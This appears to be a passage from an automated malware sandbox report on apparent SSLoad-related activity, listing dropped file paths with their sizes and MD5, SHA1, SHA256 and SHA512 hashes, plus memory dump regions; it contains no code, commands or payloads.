44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
589a1a59a9dd78f234bb4a07cb3a51d7

SHA1
9949c6bd0faaef4ee3ee2842ecaf53a3f7ada2bd

SHA256
d7c75706d0853b977a47d90386d7e8130e980507112dce77b57191f32caccabc

SHA512
ca777ab1fb4d69982f886a5e97c6c72d04b97af2a7157c781272a63d1103254dc0f1c96506d05c8bfad32ba0826dbcdc1309a358eaf9071ec15e71bb68f6e493

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
0ca4f1179d157759afbb3719f3e43470

SHA1
55120bed645c3ce358e30496596c90edf9fec8cb

SHA256
9026c04cd985bd977ab6daca24d50af0e5b21bfafe791155df8e2b4dbe8db16d

SHA512
b46c042e90261f5c44d65ae1298edd79cb5d1e61f5a47bfdf1258c6f0d1d02441549ee3e705dae2501480adc01e2d58ed61cb9ac677e3e4fc5c0cdcd55df74db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
de79436f968aec8e6c99c8282f250a7e

SHA1
79472efcd152528fb5031beb846fcf9a101f66b9

SHA256
a28fc8a2b6522a4fefa38903bdd646c66713f859026146816222bded06378d77

SHA512
12b1fd91014a472906f0284bf26dd01132578434c92cb43f30864abd3dbbfdeaa19a27a6384c02593bbb957d271d7bf17d025f8c738f9aa85fd01239e9c66d85

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI5332.tmp
Filesize
436KB

MD5
475d20c0ea477a35660e3f67ecf0a1df

SHA1
67340739f51e1134ae8f0ffc5ae9dd710e8e3a08

SHA256
426e6cf199a8268e8a7763ec3a4dd7add982b28c51d89ebea90ca792cbae14dd

SHA512
99525aaab2ab608134b5d66b5313e7fc3c2e2877395c5c171897d7a6c66efb26b606de1a4cb01118c2738ea4b6542e4eb4983e631231b3f340bf85e509a9589e

Download Submit
C:\Users\Admin\AppData\Local\sharepoint\forcedelctl.dll
Filesize
956KB

MD5
b28a478eb5b99efcdc7caf428bffb89a

SHA1
d394c7b8fe15753bfbff79fb4f648f6f8bae70f9

SHA256
3bca1dcaef4430272b9029c9a4bc8be0d45ecff66e8de8679ed30d8afab00f6f

SHA512
decb2581f64949bfaaaf0368917f0705d7a4b7392ec272eda025cf06a4384ec4cdd5202081c2e085f00645029dd96bfef262e8628bed1861185adf6281c1cc88

Download Submit
C:\Users\Admin\Desktop\kjgghhj\2024-04-17-IOCs-from-SSLoad-activity.txt
Filesize
4KB

MD5
adb0c4b7e77a1b56fa3e765047a0a19a

SHA1
a6f53658d4ac8730f5d809cd9d833c4c0c1d9019

SHA256
89394738e3ba17782ee420e7043226090310fbbf6485657d2014c1462d829bc2

SHA512
17671ced965346e5e1cd7eb835a04bbb607680e2d63115ecbf3137c15bae4b2d323e0739a8f79a364016c989cb567030cd07e941b62bebee8d351b499206e742

Download Submit
C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js
Filesize
860KB

MD5
a19108f07f6bc323fd351e46fcf76fd3

SHA1
42a811f94a7294d6d870641f4a54f5ab67e23d16

SHA256
2b36385eea638d0d1b6cd608a1ecf500281c94cbb6454fe1bf13dc92e4a8b028

SHA512
a79abcff48c6c87ef51d2ab09d6978014c18b30709260220ca4d38217a4591b6dd7065e1f69da896b1b0d50426a7204e5b01fc1015e30fabf7786cfce6d5faf7

Download Submit
C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js-stripped.txt
Filesize
1KB

MD5
867fc9cba41c84586144bd84d30566f4

SHA1
ab69bb14eebd02b08e4c1b99b0739d119db7746a

SHA256
54d1824db32b28e82ac04fe2e3d88796c12c9a04e76d6025714861f43d862129

SHA512
32d8fd157c232677950571ed76ebfabb632f1512ae785dddf950f9d9ac24d88929c3653b42f31e2afc57832af92477dfdcdd04d4c2f6dde8e7671f020fb6ca50

Download Submit
C:\Users\Admin\Desktop\kjgghhj\avp.msi
Filesize
1.4MB

MD5
4d81be09c23e02fab7364e508c21c111

SHA1
52cae521d7a808c8206f4b5afd6b037bc573b50e

SHA256
dcae57ec4b69236146f744c143c42cc8bdac9da6e991904e6dbf67ec1179286a

SHA512
4f5b4fdeb9a056025455ede8ee6e1757da8db64f9692df2a46558a3c04aaec551734b4d75803bbd579e1163b9aba5005f71c5efb22ee3d336779804a11b2b5a5

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 564349.crdownload
Filesize
2.0MB

MD5
3117207664340b08ae8197d504348de1

SHA1
240104337afbf53f261df29c09239480642b6936

SHA256
151fe8f44b4257308aae4dd4a4081fe85d465756b137ed29a10638b246a60a01

SHA512
25493e6ed25b17ad219cc8964a55ae0a2ac10be86dc7bb15d35938f5341dd59fbd149cb7624cf3b9564b4f88d04da094d4218e60846e6c84feb0f0e69d378a8e

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
Filesize
23.7MB

MD5
9416ef7532c00a247412c82c84bb8122

SHA1
54852bfd929a42737796697d394917d0c0158f31

SHA256
4d711c3c755f1709fdbe075d1b845d50094d86fda46b6ed2e390f3d218d68464

SHA512
d64bea29cf3b6fa1e95a9e2433c1c5d229d59c55baf71170d8781de5921c819aac1bc477cf4787d640022ea7454add0d020cf50ac3e4616561e3b183dc1346b8

Download Submit
\??\Volume{a968b372-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{843a17f9-9ecd-49a6-84d6-fc6aaf72e97e}_OnDiskSnapshotProp
Filesize
6KB

MD5
06347319e840a70f5d2be693001bc31e

SHA1
d85c0657f42433f691d35d14635f91ac6186c196

SHA256
accd019a54ef0c0d94494ecf25120940ca18400d0380d2e0bce5875ca6cc9dc6

SHA512
2e535bec2bb52038c9862cd8d9a647dd4121333f1dd4525c08ae2333fbddf783908048b56c56f843991f336d9fa708771a59c774699afaa2324d29b9199a2e9a

Download Submit
\??\pipe\LOCAL\crashpad_4628_GWVWPVAIEVXKOBCW
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1952-290-0x0000000010000000-0x00000000100F9000-memory.dmp

Filesize
996KB

Download
memory/1952-291-0x0000000003530000-0x00000000035A3000-memory.dmp

Filesize
460KB

Download
memory/2408-298-0x0000021D56410000-0x0000021D56411000-memory.dmp

Filesize
4KB

Download
memory/2408-300-0x0000021D56410000-0x0000021D56411000-memory.dmp

Filesize
4KB

Download
memory/2408-304-0x0000021D56410000-0x0000021D56411000-memory.dmp

Filesize
4KB

Download
memory/2408-305-0x0000021D56410000-0x0000021D56411000-memory.dmp

Filesize
4KB

Download
memory/2408-310-0x0000021D56410000-0x0000021D56411000-memory.dmp

Filesize
4KB

Download
memory/2408-309-0x0000021D56410000-0x0000021D56411000-memory.dmp

Filesize
4KB

Download
memory/2408-308-0x0000021D56410000-0x0000021D56411000-memory.dmp

Filesize
4KB

Download
memory/2408-307-0x0000021D56410000-0x0000021D56411000-memory.dmp

Filesize
4KB

Download
memory/2408-306-0x0000021D56410000-0x0000021D56411000-memory.dmp

Filesize
4KB

Download
memory/2408-299-0x0000021D56410000-0x0000021D56411000-memory.dmp

Filesize
4KB

Download